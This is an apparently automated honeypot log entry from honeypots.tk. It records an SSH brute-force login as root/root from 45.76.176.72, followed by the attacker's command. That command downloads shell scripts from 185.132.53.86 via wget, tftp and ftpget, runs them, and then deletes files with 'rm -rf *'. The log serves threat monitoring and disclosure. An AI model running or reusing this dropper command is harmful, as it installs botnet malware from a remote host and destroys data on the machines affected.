honeypots.tk

Record Observations : 45.76.176.72 ssh Web script execution 45.76.176.72 HIDO0NL328WPT64C

<< Back

45.76.176.72 client username 'DUP root' and password 'root' entered
45.76.176.72 client command : 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.86/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 185.132.53.86 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.132.53.86; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.132.53.86 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *'
Author: Honeypots.tk Robot